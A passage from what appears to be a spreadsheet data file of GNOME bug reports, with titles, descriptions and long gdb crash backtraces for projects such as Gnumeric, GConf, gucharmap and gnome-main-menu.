   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4052104b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c09a in e_msgport_wait (mp=0x81a0d40) at e-msgport.c:305
	msg = (struct _EMsg *) 0x4412e9fc
#4  0x4008c93a in thread_dispatch (din=0x81c3e98) at e-msgport.c:665
	m = (struct _EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 32773
#5  0x40522941 in pthread_start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 5 (Thread 24580 (LWP 12046)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40524108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4052104b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c09a in e_msgport_wait (mp=0x8110060) at e-msgport.c:305
	msg = (struct _EMsg *) 0x4392e9fc
#4  0x4008c93a in thread_dispatch (din=0x8110308) at e-msgport.c:665
	m = (struct _EMsg *) 0x0
	info = (struct _thread_info *) 0xfffffffc
	self = 24580
#5  0x40522941 in pthread_start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 4 (Thread 16387 (LWP 12045)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40524108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4052104b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008cd42 in e_mutex_lock (m=0x81728f0) at e-msgport.c:866
	id = 16387
#4  0x415b67fd in camel_service_connect (service=0x8174628 ex=0x819c998)
    at camel-service.c:364
	ret = 135907736
	unreg = 0
#5  0x415b83f6 in camel_session_get_service_connected (session=0x8160bb8 
    url_string=0x819ca60 imap://mv@luna.statsbiblioteket.dk/INBOX 
    type=CAMEL_PROVIDER_STORE ex=0x819c998) at camel-session.c:524
	svc = (struct _CamelService *) 0x8174628
#6  0x4151a2c4 in mail_tool_uri_to_folder (
    uri=0x819ca60 imap://mv@luna.statsbiblioteket.dk/INBOX flags=0 
    ex=0x819c998) at mail-tools.c:309
	url = (struct _CamelURL *) 0x8107c90
	store = (struct _CamelStore *) 0x819ca60
	folder = (struct _CamelFolder *) 0x0
	offset = 0
#7  0x4151a9ce in vfolder_adduri_do (mm=0x819c980) at mail-vfolder.c:229
	l = (struct _GList *) 0x819c980
	folder = (struct _CamelFolder *) 0x0
#8  0x4151006b in mail_msg_received (e=0x8110290 msg=0x819c980 data=0x0)
    at mail-mt.c:502
No locals.
#9  0x4008c7a6 in thread_received_msg (e=0x8110290 m=0x819c980)
    at e-msgport.c:617
	func = (void (*)(struct _EThread * struct _EMsg * 
    void *)) 0x4150ff68 
	func_data = (void *) 0x0
#10 0x4008c8a1 in thread_dispatch (din=0x8110290) at e-msgport.c:698
	m = (struct _EMsg *) 0x819c980
	info = (struct _thread_info *) 0xfffffffc
	self = 16387
#11 0x40522941 in pthread_start_thread () from /lib/i686/libpthread.so.0
No symbol table info available.
Thread 3 (Thread 8194 (LWP 12044)):
#0  0x42028d69 in sigsuspend () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x40524108 in __pthread_wait_for_restart_signal ()
   from /lib/i686/libpthread.so.0
No symbol table info available.
#2  0x4052104b in pthread_cond_wait () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x4008c09a in e_msgport_wait (mp=0x80fc2e8) at e-msgport.c:305
	msg = (struct _EMsg *) 0x4292e7bc
#4  0x41517d78 in get_password (session=0xfffffffc 
    prompt=0xfffffffc  reprompt=-4 
    secret=-4 service=0x8174628 item=0x41987ea7 password ex=0xfffffffc)
    at mail-session.c:371
	m = (struct _pass_msg *) 0x80fc398
	r = (struct _pass_msg *) 0xfffffffc
	pass_reply = (struct _EMsgPort *) 0x80fc2e8
	ret = 0x8174628 PD\027\b</t>
  </si>
  <si>
    <t>BRASERO-528466</t>
  </si>
  <si>
    <t>Missing icons in project views</t>
  </si>
  <si>
    <t>Both the data- and audio project views are missing some (mime) icons.</t>
  </si>
  <si>
    <t>GNUMERIC-125230</t>
  </si>
  <si>
    <t>using some time formats change the value</t>
  </si>
  <si>
    <t>Just take a new document. 
1. Pre-format cell(s) as 'Time' or 'Custom' with format code [h]:mm:ss 
2. Type 0:3:44 or 0:03:44 
3. After pressing enter value changes to 0:03:43 
4. If we now change format to h:mm:ss (was [h]:mm:ss) cell shows right 
value i.e 0:03:44 
We could replicate this with Gnumeric 1.2.0 on Debian and 1.2.1 on SuSE 
also tried with different locale settings always the same.</t>
  </si>
  <si>
    <t>ain</t>
  </si>
  <si>
    <t>GSTREAMER-117692</t>
  </si>
  <si>
    <t>[docs/mime] docs/random/mimetypes needs updating</t>
  </si>
  <si>
    <t>The current documentation leaves out 2 important issues:
1) boundaries
2) media-specific offset
1) boundaries
There are implicit assumptions in nearly all plugins about where you may
split a stream into buffers. Video often does 1 frame/buffer raw audio
does channelcount samples per buffer and so on.
2) media-specific offset
GstFormat and GstBuffer specify a media specific offset/format. For every
mimetype there needs to be documentation on what they mean.
Apart from that it needs to get out of docs/random and into the official
documentation.</t>
  </si>
  <si>
    <t>GNOME-KEYRING-462349</t>
  </si>
  <si>
    <t>ld on solaris does not recognize --version-script</t>
  </si>
  <si>
    <t>Please describe the problem:
/opt/jdsbld/bin/ld-wrapper -G -z text -h libgnome-keyring.so.0 -o .libs/libgnome-keyring.so.0.1.1  .libs/gnome-keyring.o -z allextract ./.libs/libgnome-keyring-common.a ../common/.libs/libgkr-module-common.a -z defaultextract  -ldbus-1 -lglib-2.0 -lsocket -lc  --version-script=./gnome-keyring-export.map
/usr/ccs/bin/ld: illegal option -- version-script=./gnome-keyring-export.map
usage: ld [-6:abc:d:e:f:h:il:mo:p:rstu:z:B:CD:F:GI:L:M:N:P:Q:R:S:VY:?] file(s)
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>haltonhuo</t>
  </si>
  <si>
    <t>EPIPHANY-EXTENSIONS-307484</t>
  </si>
  <si>
    <t>Newsfeed subsription assertion failure</t>
  </si>
  <si>
    <t>Setup:
 - dbus 0.33 Ubuntu Breezy
1. Start epiphany. Enable News Feed Subsription extension.
2. Start an aggregator that supports the org.gnome.feed.Reader service.
3. Go to a site with an rss/atom feed. Right click the link and click Subscribe
to this feed
What happens ...
1. Got a message in the console
---
7299: arguments to dbus_message_iter_append_basic() were incorrect assertion
real-&gt;iter_type == DBUS_MESSAGE_ITER_TYPE_WRITER failed in file dbus-message.c
line 2073.
This is normally a bug in some application using the D-BUS library.
---
I expect it to call the aggregators's Subsribe interface.</t>
  </si>
  <si>
    <t>jmalonzo</t>
  </si>
  <si>
    <t>GCONF-151334</t>
  </si>
  <si>
    <t>Markup backend</t>
  </si>
  <si>
    <t>Can't access defaults value after install</t>
  </si>
  <si>
    <t>Hello I am install schema file as root with 
gconftool-2 --makefile-install-rule. Just after that I run  
gconftool-2 --get /apps/application/key and gconftool tells me 
that there is no such key. Expected results - it will show me  
default value as described in schema. I've managed to run 
gconftool-2 --shutdown in order to make things work. 
The problem is hidden is markup backend in markup-tree.c. There is function  
load_dir which has cache - key subdirs_loaded. This key doesn't updated 
after schema install. As a result application crashes since it can't get 
default values.</t>
  </si>
  <si>
    <t>GUCHARMAP-112536</t>
  </si>
  <si>
    <t>Don't use tabs and trailing newlines in gucharmap messages</t>
  </si>
  <si>
    <t>#: gucharmap/gucharmap-charmap.c:273
msgid Canonical decomposition: \t
#: gucharmap/gucharmap-charmap.c:305
# c-format
msgid See also: \t\t\t\t\tU+%4.4X %s\n
#: gucharmap/gucharmap-charmap.c:308
# c-format
msgid \t\t\t\t\t\tU+%4.4X %s\n
#: gucharmap/gucharmap-charmap.c:331
# c-format
msgid Alias names: \t\t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:333 gucharmap/gucharmap-charmap.c:358
#: gucharmap/gucharmap-charmap.c:384
# c-format
msgid \t\t\t\t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:356
# c-format
msgid Notes: \t\t\t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:381
# c-format
msgid Approximate equivalents: \t%s\n
#: gucharmap/gucharmap-charmap.c:407
# c-format
msgid Equivalents: \t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:410
# c-format
msgid \t\t\t\t\t\t\t%s\n
#. character category
#: gucharmap/gucharmap-charmap.c:461
# c-format
msgid Unicode category: \t\t\t%s\n
#. UTF-8
#: gucharmap/gucharmap-charmap.c:483
msgid UTF-8: \t\t\t\t\t
#. octal \012\234 UTF-8
#: gucharmap/gucharmap-charmap.c:491
msgid Octal escaped UTF-8: \t\t
#. entity reference
#: gucharmap/gucharmap-charmap.c:499
# c-format
msgid Decimal entity reference: \t\n
#: gucharmap/gucharmap-charmap.c:559
# c-format
msgid Definition in English: \t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:567
# c-format
msgid Mandarin Pronunciation: \t\t%s\n
#: gucharmap/gucharmap-charmap.c:575
# c-format
msgid Japanese On Pronunciation: \t\t%s\n
#: gucharmap/gucharmap-charmap.c:583
# c-format
msgid Japanese Kun Pronunciation: \t\t%s\n
#: gucharmap/gucharmap-charmap.c:591
# c-format
msgid Tang Pronunciation: \t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:599
# c-format
msgid Korean Pronunciation: \t\t\t%s\n
#: gucharmap/gucharmap-charmap.c:457
msgid 
General Character Properties\n
\n
#: gucharmap/gucharmap-charmap.c:479
msgid 
Various Useful Representations\n
\n
#: gucharmap/gucharmap-charmap.c:506
msgid 
Annotations and Cross References\n
\n
#: gucharmap/gucharmap-charmap.c:553
msgid 
CJK Ideograph Information\n
\n
Please don't use tabs inside messages and please avoid the trailing
newlines if you can. The reasons are several and listed on the
http://developer.gnome.org/doc/tutorials/gnome-i18n/developer.html#language
page:
---
Keep in mind that being consistent when designing messages is not only
about using consistent writing. It's also about having a consistent use of
whitespace and newlines. Every change in whitespace or the number of
trailing newlines in otherwise identical messages means additional messages
for the translators to translate.
Also try to be consistent and don't use whitespace before colons question
marks excalamation marks and other marks.
[...]
Also avoid using tabs inside messages. Tabs are often used for alignment
inside console text messages but the amount of spacing the tab character
(\t) represents is not easily clear from a visual inspection and it's
difficult to get the correct amount of tabs to use in the translated
message in order for the translated message to align properly since the
translated words or sentence often is of a different length than the
original. Please replace tabs with spaces inside messages (if you have to
use spacing inside the message).
---
I'm not sure I understand why intra-message spacing is needed here at all
and why things like \t\t\t\t\t\tU+%4.4X %s\n is marked for translation to
begin with.</t>
  </si>
  <si>
    <t>EOG-327424</t>
  </si>
  <si>
    <t>image viewer</t>
  </si>
  <si>
    <t>progress bar changes view size which forces re-zooming of image</t>
  </si>
  <si>
    <t>Please describe the problem:
When you switch from one image to another in eog
a progress bar shows up. That changes the view which forces
a re-zoom of the image! And when the progressbar goes away
it has to zoom back.
This makes images load much slower and looks wierd.
Steps to reproduce:
Can be reproduced with all themes I've tried.
Open a large picture in a folder with many pictures and watch closely
as you switch!
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>NAUTILUS-SENDTO-519091</t>
  </si>
  <si>
    <t>NAUTILUS-SENDTO</t>
  </si>
  <si>
    <t>Sending to bluetooth fails</t>
  </si>
  <si>
    <t>Sending files to bluetooth devices using nautilus-sendto does not work. There is not even a error message. Sending files using the context menu of bluetooth-applet (bluez-gnome) works fine here.</t>
  </si>
  <si>
    <t>nautilus-sendto-maint</t>
  </si>
  <si>
    <t>GNOME-MAIN-MENU-409934</t>
  </si>
  <si>
    <t>Crash when adding menu to panel</t>
  </si>
  <si>
    <t>I cannot add the menu to my panel because it crashes right away...
System: Linux 2.6.19 #4 Sun Dec 31 02:34:48 CET 2006 i686
X Vendor: The X.Org Foundation
X Vendor Release: 70101000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks
Icon Theme: Tango
Memory status: size: 22601728 vsize: 22601728 resident: 9068544 share: 7352320 rss: 9068544 rss_rlim: 4294967295
CPU usage: start_time: 1171960666 rtime: 14 utime: 12 stime: 2 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/opt/gnome-2-18/libexec/gnome-main-menu'
Using host libthread_db library /lib/tls/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread -1227675968 (LWP 17644)]
0xb749c20e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#0  0xb749c20e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
#1  0xb7e9a0f5 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:872
#2  
#3  0xb7a3ecd5 in IA__gtk_tree_model_get_valist (tree_model=0x807ced0 
    iter=0xbfef40e8 var_args=0xbfef402c H@Ã¯Â¿\002) at gtktreemodel.c:1442
#4  0xb7a3eebd in IA__gtk_tree_model_get (tree_model=0x807ced0 
    iter=0xbfef40e8) at gtktreemodel.c:1404
#5  0x0804f9a6 in select_page (this=0x80b9c18 iter=0xbfef40e8)
    at file-area-widget.c:391
#6  0x080501ec in file_area_widget_new (ui=0x807ce90 engine=0x80b76b0)
    at file-area-widget.c:258
#7  0x08052834 in build_main_menu_window (ui=0x807ce90) at main-menu-ui.c:401
#8  0x080536a4 in main_menu_ui_new (applet=0x8093000 conf=0x80987b0 
    engine=0x80b76b0) at main-menu-ui.c:230
#9  0x08051524 in main_menu_applet_init (applet=0x8093000 
    iid=0x80aaa20 OAFIID:GNOME_MainMenu user_data=0x0) at main-menu.c:66
#10 0xb7f09310 in panel_applet_marshal_BOOLEAN__STRING (closure=0x8089598 
    return_value=0xbfef4444 n_param_values=2 param_values=0x80ac990 
    invocation_hint=0x0 marshal_data=0x8051430) at panel-applet-marshal.c:128
#11 0xb756608b in IA__g_closure_invoke (closure=0x8089598 
    return_value=0xbfef4444 n_param_values=2 param_values=0x80ac990 
    invocation_hint=0x0) at gclosure.c:490
#12 0xb7cc9cd3 in bonobo_closure_invoke_va_list (closure=0x8089598 
    return_value=0xbfef4444 var_args=0xbfef447c Ã˜\224\b\b)
    at bonobo-types.c:404
#13 0xb7cc9f5c in bonobo_closure_invoke (closure=0x8089598 return_type=20)
    at bonobo-types.c:467
#14 0xb7f07f96 in panel_applet_control_bound (control=0x8064b20 
    applet=0x8093000) at panel-applet.c:1377
#15 0xb757351b in IA__g_cclosure_marshal_VOID__VOID (closure=0x80aaa68 
    return_value=0x0 n_param_values=1 param_values=0xbfef46ec 
    invocation_hint=0xbfef45fc marshal_data=0xb7f07ed0) at gmarshal.c:77
#16 0xb756608b in IA__g_closure_invoke (closure=0x80aaa68 return_value=0x0 
    n_param_values=1 param_values=0xbfef46ec invocation_hint=0xbfef45fc)
    at gclosure.c:490
#17 0xb7576cd3 in signal_emit_unlocked_R (node=0x80a48a8 detail=0 
    instance=0x8064b20 emission_return=0x0 instance_and_params=0xbfef46ec)
    at gsignal.c:2440
#18 0xb75781c9 in IA__g_signal_emit_valist (instance=0x8064b20 signal_id=98 
    detail=0 
    var_args=0xbfef492c |KÃ¯Â¿ÃIÃ¯Â¿Â¨Ãƒ\n\bÃ\n\b\b\220\027Ã…Â·\020JÃ¯Â¿\020JÃ¯Â¿hIÃ¯Â¿!Ã‹ÃŒÂ·4K\006\bÃ€Ãˆ\n\b|KÃ¯Â¿\034Ã‚ÃƒÂ·Ã´Â¿HÂ·Ã€Ã”HÂ·\210IÃ¯Â¿\027\fÃƒÂ·4K\006\b) at gsignal.c:2199
#19 0xb7578379 in IA__g_signal_emit (instance=0x8064b20 signal_id=98 
    detail=0) at gsignal.c:2243
#20 0xb7ddc6a7 in impl_Bonobo_Control_setFrame (servant=0x8064b34 
    frame=0x80ac8c0 ev=0xbfef4b7c) at bonobo-control.c:434
#21 0xb7cccb21 in _ORBIT_skel_small_Bonobo_Control_setFrame (
    _o_servant=0x8064b34 _o_retval=0x0 _o_args=0xbfef4a10 
    _o_ctx=0xbfef4a6c _o_ev=0xbfef4b7c 
    _impl_setFrame=0xb7ddc600 )
    at Bonobo-common.c:584
#22 0xb7c30c17 in ORBit_POAObject_invoke (pobj=0x80aa8e0 ret=0x0 
    args=0xbfef4a10 ctx=0xbfef4a6c data=0xbfef4ae8 ev=0xbfef4b7c)
    at poa.c:1142
#23 0xb7c36e65 in ORBit_OAObject_invoke (adaptor_obj=0x80aa8e0 ret=0x0 
    args=0xbfef4a10 ctx=0xbfef4a6c data=0xbfef4ae8 ev=0xbfef4b7c)
    at orbit-adaptor.c:336
#24 0xb7c23da9 in ORBit_small_invoke_adaptor (adaptor_obj=0x80aa8e0 
    recv_buffer=0x80ac3a8 m_data=0xb7cef300 data=0xbfef4ae8 ev=0xbfef4b7c)
    at orbit-small.c:844
#25 0xb7c34a9a in ORBit_POAObject_handle_request (pobj=0x80aa8e0 
    opname=0x80ac454 setFrame ret=0x0 args=0x0 ctx=0x0 
    recv_buffer=0x80ac3a8 ev=0xbfef4b7c) at poa.c:1351
#26 0xb7c3512c in ORBit_POAObject_invoke_incoming_request (pobj=0x80aa8e0 
    recv_buffer=0x80ac3a8 opt_ev=0xbfef4b7c) at poa.c:1421
#27 0xb7c35bcb in ORBit_POA_handle_request (poa=0x8080b40 
    recv_buffer=0x80ac3a8 objkey=0x80ac3c0) at poa.c:1643
#28 0xb7c37003 in ORBit_handle_request (orb=0x8080ad0 recv_buffer=0x80ac3a8)
    at orbit-adaptor.c:296
#29 0xb7c20138 in giop_connection_handle_input (lcnx=0x807ce10)
    at giop-recv-buffer.c:1308
#30 0xb7c3dd4d in link_connection_io_handler (gioc=0x0 
    condition= data=0x807ce10) at linc-connection.c:1387
#31 0xb7c40bb0 in link_source_dispatch (source=0x80ac2a0 
    callback=0xb7c3dc70  user_data=0x807ce10)
    at linc-source.c:159
#32 0xb74eea31 in IA__g_main_context_dispatch (context=0x807ff08)
    at gmain.c:2045
#33 0xb74f1aa6 in g_main_context_iterate (context=0x807ff08 block=1 
    dispatch=1 self=0x805c560) at gmain.c:2677
#34 0xb74f1e67 in IA__g_main_loop_run (loop=0x80897c8) at gmain.c:2881
#35 0xb7cb78c3 in bonobo_main () at bonobo-main.c:311
#36 0xb7cb5b2b in bonobo_generic_factory_main_timeout (
    act_iid=0x8089620 :0.0OAFIID:GNOME_MainMenu_Factory 
    factory_cb=0xb7f03e50  
    user_data=0x8089610 quit_timeout=2000) at bonobo-generic-factory.c:412
#37 0xb7cb5bb4 in bonobo_generic_factory_main (
    act_iid=0x8089620 :0.0OAFIID:GNOME_MainMenu_Factory 
    factory_cb=0xb7f03e50  
    user_data=0x8089610) at bonobo-generic-factory.c:369
#38 0xb7f046b1 in panel_applet_factory_main_closure (
    iid=0x805934e OAFIID:GNOME_MainMenu_Factory applet_type=134780120 
    closure=0x8089598) at panel-applet.c:1757
#39 0xb7f04793 in panel_applet_factory_main (
    iid=0x805934e OAFIID:GNOME_MainMenu_Factory applet_type=134780120 
    callback=0x8051430  data=0x0)
    at panel-applet.c:1781
#40 0x08051403 in main (argc=) at main-menu.c:34
Thread 1 (Thread -1227675968 (LWP 17644)):
#0  0xb749c20e in __waitpid_nocancel () from /lib/tls/libpthread.so.0
No symbol table info available.
#1  0xb7e9a0f5 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:872
	estatus = 2
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {5854960 3067809404 3074178260 3086110708 
      3074998260 1024 135410680 3220126712 3074183482 3075003584 
      135411712 1025 135410680 3075046935 135410680 3074998260 
      3075003584 1016 3220126744 3074186940 3075003584 1024 1016 
      3075998756 0 1016 5 3074187368 1024 1 3220126792 3075350999}} 
  sa_flags = 135350272 sa_restorer = 0xc}
	pid = 0
	in_segv = 1
#2  
No symbol table info available.
#3  0xb7a3ecd5 in IA__gtk_tree_model_get_valist (tree_model=0x807ced0 
    iter=0xbfef40e8 var_args=0xbfef402c H@Ã¯Â¿\002) at gtktreemodel.c:1442
	_vtable = (GTypeValueTable *) 0xb7497e17
	_lcopy_format = (
    gchar *) 0xbfef3fa8 Ãœ^YÂ·Ã°VYÂ· \203\020\bL\034\020\bÃ¨?Ã¯Â¿\n\017XÂ·Ã€^YÂ·
	_cvalues = {{v_int = -1074839624 v_long = -1074839624 
    v_int64 = -5236188003941007432 v_double = -3.8246710480502864e-42 
    v_pointer = 0xbfef3fb8} {v_int = -1218879808 v_long = -1218879808 
    v_int64 = -5239518149927674176 v_double = -2.2862194246439581e-42 
    v_pointer = 0xb7595ec0} {v_int = -1074839624 v_long = -1074839624 
    v_int64 = -5237452407953211464 v_double = -3.0189463263520217e-42 
    v_pointer = 0xbfef3fb8} {v_int = -1218879804 v_long = -1218879804 
    v_int64 = -5239518149927674172 v_double = -2.2862194246439593e-42 
    v_pointer = 0xb7595ec4} {v_int = -1218879780 v_long = -1218879780 
    v_int64 = -5235057499973263652 v_double = -4.5450697386565899e-42 
    v_pointer = 0xb7595edc} {v_int = 135299872 v_long = 135299872 
    v_int64 = 580995464809186080 v_double = 7.6238415311710347e-270 
    v_pointer = 0x8108320} {v_int = -1074839576 v_long = -1074839576 
    v_int64 = -5235418027973984280 v_double = -4.3153280419826749e-42 
    v_pointer = 0xbfef3fe8} {v_int = -1218879808 v_long = -1218879808 
    v_int64 = -4616400721211203904 v_double = -0.97656284151431549 
    v_pointer = 0xb7595ec0}}
	_n_values = 
	column = 0
	__PRETTY_FUNCTION__ = IA__gtk_tree_model_get_valist
#4  0xb7a3eebd in IA__gtk_tree_model_get (tree_model=0x807ced0 
    iter=0xbfef40e8) at gtktreemodel.c:1404
	var_args = 0xbfef4028 
	__PRETTY_FUNCTION__ = IA__gtk_tree_model_get
#5  0x0804f9a6 in select_page (this=0x80b9c18 iter=0xbfef40e8)
    at file-area-widget.c:391
	file_class = 9003915
	page_id = -1208901488
#6  0x080501ec in file_area_widget_new (ui=0x807ce90 engine=0x80b76b0)
    at file-area-widget.c:258
	this = (FileAreaWidget *) 0x80b9c18
	priv = 
	alignment = 
	table = (GtkWidget *) 0x0
	renderer = 
	iter_cur = {stamp = -1074839272 user_data = 0x804f055 
  user_data2 = 0x80b8110 user_data3 = 0x8058e43}
	iter = {stamp = 0 user_data = 0x50 user_data2 = 0x804fb50 
  user_data3 = 0x0}
	page_id = 134520948
	showable_types_list = 
	showable = {0 0 0}
	tiles = (GList *) 0x16
	markup = 
	node = 
	i = 
#7  0x08052834 in build_main_menu_window (ui=0x807ce90) at main-menu-ui.c:401
	priv = (MainMenuUIPrivate *) 0x807cea0
	window = (GtkWidget *) 0xb7497e00
	left_pane = (GtkWidget *) 0x1
	search_show_label_group = 
	search_widget = (GtkWidget *) 0xbfef41a8
	right_pane = 
	right_pane_group = 
	icon_group = 
	label_group = 
	system_header = 
	status_header = 
	system_table_widget = 
	status_section = 
	hd_tile = 
	net_tile = 
#8  0x080536a4 in main_menu_ui_new (applet=0x8093000 conf=0x80987b0 
    engine=0x80b76b0) at main-menu-ui.c:230
	ui = (MainMenuUI *) 0x807ce90
	priv = (MainMenuUIPrivate *) 0x807cea0
	gdk_atom_slab_action = 
#9  0x08051524 in main_menu_applet_init (applet=0x8093000 
    iid=0x80aaa20 OAFIID:GNOME_MainMenu user_data=0x0) at main-menu.c:66
	argv = {0x805936c slab}
	conf = (MainMenuConf *) 0x80987b0
	engine = (MainMenuEngine *) 0x80b76b0
	ui = 
#10 0xb7f09310 in panel_applet_marshal_BOOLEAN__STRING (closure=0x8089598 
    return_value=0xbfef4444 n_param_values=2 param_values=0x80ac990 
    invocation_hint=0x0 marshal_data=0x8051430) at panel-applet-marshal.c:128
	data1 = (gpointer) 0x8093000
	data2 = 
	v_return = 
	__PRETTY_FUNCTION__ = panel_applet_marshal_BOOLEAN__STRING
#11 0xb756608b in IA__g_closure_invoke (closure=0x8089598 
    return_value=0xbfef4444 n_param_values=2 param_values=0x80ac990 
    invocation_hint=0x0) at gclosure.c:490
	marshal = (
    GClosureMarshal) 0xb7f092b0 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#12 0xb7cc9cd3 in bonobo_closure_invoke_va_list (closure=0x8089598 
    return_value=0xbfef4444 var_args=0xbfef447c Ã˜\224\b\b)
    at bonobo-types.c:404
	i = 
	type = 
	params = (GArray *) 0x805d960
	__PRETTY_FUNCTION__ = bonobo_closure_invoke_va_list
#13 0xb7cc9f5c in bonobo_closure_invoke (closure=0x8089598 return_type=20)
    at bonobo-types.c:467
	_vtable = 
	_lcopy_format = 
	_cvalues = {{v_int = 1073741825 v_long = 1073741825 
    v_int64 = -5235048774602063871 v_double = -4.5506298659685896e-42 
    v_pointer = 0x40000001} {v_int = 32 v_long = 32 
    v_int64 = -5239704176627285984 v_double = -2.2269478985627105e-42 
    v_pointer = 0x20} {v_int = 134769184 v_long = 134769184 
    v_int64 = -4616395604551505376 v_double = -0.97713090485496323 
    v_pointer = 0x8086a20} {v_int = -1218947788 v_long = -1218947788 
    v_int64 = -5235048910038739660 v_double = -4.5505435607395215e-42 
    v_pointer = 0xb7585534} {v_int = 0 v_long = 0 v_int64 = 17179869184 
    v_double = 8.4879831638610893e-314 v_pointer = 0x0} {
    v_int = -1219913867 v_long = -1219913867 
    v_int64 = -5206141426495547531 v_double = -3.6895232738822256e-40 
    v_pointer = 0xb7499775} {v_int = 16 v_long = 16 
    v_int64 = -4616396291881041904 v_double = -0.9770545959472674 
    v_pointer = 0x10} {v_int = -1212157979 v_long = -1212157979 
    v_int64 = -5203418915438333979 v_double = -5.9101749696085977e-40 
    v_pointer = 0xb7bfefe5}}
	_n_values = 
	error = 
	rtype = 
	return_value = {g_type = 20 data = {{v_int = 0 v_uint = 0 
      v_long = 0 v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 
      v_double = 0 v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0}}}
	var_args = 0xbfef447c Ã˜\224\b\b
	__PRETTY_FUNCTION__ = bonobo_closure_invoke
#14 0xb7f07f96 in panel_applet_control_bound (control=0x8064b20 
    applet=0x8093000) at panel-applet.c:1377
	ret = 
	__PRETTY_FUNCTION__ = panel_applet_control_bound
#15 0xb757351b in IA__g_cclosure_marshal_VOID__VOID (closure=0x80aaa68 
    return_value=0x0 n_param_values=1 param_values=0xbfef46ec 
    invocation_hint=0xbfef45fc marshal_data=0xb7f07ed0) at gmarshal.c:77
	data1 = (gpointer) 0x8064b20
	data2 = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_cclosure_marshal_VOID__VOID
#16 0xb756608b in IA__g_closure_invoke (closure=0x80aaa68 return_value=0x0 
    n_param_values=1 param_values=0xbfef46ec invocation_hint=0xbfef45fc)
    at gclosure.c:490
	marshal = (
    GClosureMarshal) 0x804dae4 
	marshal_data = (gpointer) 0x0
	__PRETTY_FUNCTION__ = IA__g_closure_invoke
#17 0xb7576cd3 in signal_emit_unlocked_R (node=0x80a48a8 detail=0 
    instance=0x8064b20 emission_return=0x0 instance_and_params=0xbfef46ec)
    at gsignal.c:2440
	tmp = 
	handler = (Handler *) 0x80a98e0
	accumulator = (SignalAccumulator *) 0x0
	emission = {next = 0x0 instance = 0x8064b20 ihint = {
    signal_id = 98 detail = 0 run_type = G_SIGNAL_RUN_FIRST} 
  state = EMISSION_RUN chain_type = 4}
	class_closure = (GClosure *) 0x80a4af8
	handler_list = (Handler *) 0x80a98e0
	return_accu = (GValue *) 0x0
	accu = {g_type = 0 data = {{v_int = 0 v_uint = 0 v_long = 0 
      v_ulong = 0 v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 
      v_pointer = 0x0} {v_int = 0 v_uint = 0 v_long = 0 v_ulong = 0 
      v_int64 = 0 v_uint64 = 0 v_float = 0 v_double = 0 v_pointer = 0x0}}}
	signal_id = 98
	max_sequential_handler_number = 19
	return_value_altered = 0
#18 0xb75781c9 in IA__g_signal_emit_valist (instance=0x8064b20 signal_id=98 
    detail=0 
    var_args=0xbfef492c |KÃ¯Â¿ÃIÃ¯Â¿Â¨Ãƒ\n\bÃ\n\b\b\220\027Ã…Â·\020JÃ¯Â¿\020JÃ¯Â¿hIÃ¯Â¿!Ã‹ÃŒÂ·4K\006\bÃ€Ãˆ\n\b|KÃ¯Â¿\034Ã‚ÃƒÂ·Ã´Â¿HÂ·Ã€Ã”HÂ·\210IÃ¯Â¿\027\fÃƒÂ·4K\006\b) at gsignal.c:2199
	_flags = 
	_vtable = 
	_cvalues = {{v_int = -1211820144 v_long = -1211820144 
    v_int64 = 71802623888 v_double = 3.5475209744320837e-313 
    v_pointer = 0xb7c51790} {v_int = 134729296 v_long = 134729296 
    v_int64 = -4616391000346603952 v_double = -0.97764207428412853 
    v_pointer = 0x807ce50} {v_int = -1212000707 v_long = -1212000707 
    v_int64 = 578727192448620093 v_double = 5.6909572900362968e-270 
    v_pointer = 0xb7c2563d} {v_int = 134783548 v_long = 134783548 
    v_int64 = 579494648616624700 v_double = 6.3360879570357646e-270 
    v_pointer = 0x808a23c} {v_int = -1218966060 v_long = -1218966060 
    v_int64 = -5206141426494599724 v_double = -3.6895232746553167e-40 
    v_pointer = 0xb7580dd4} {v_int = 8 v_long = 8 
    v_int64 = -4616391481517670392 v_double = -0.97758865356445401 
    v_pointer = 0x8} {v_int = -1212157979 v_long = -1212157979 
    v_int64 = 7377776613 v_double = 3.6451059671742895e-314 
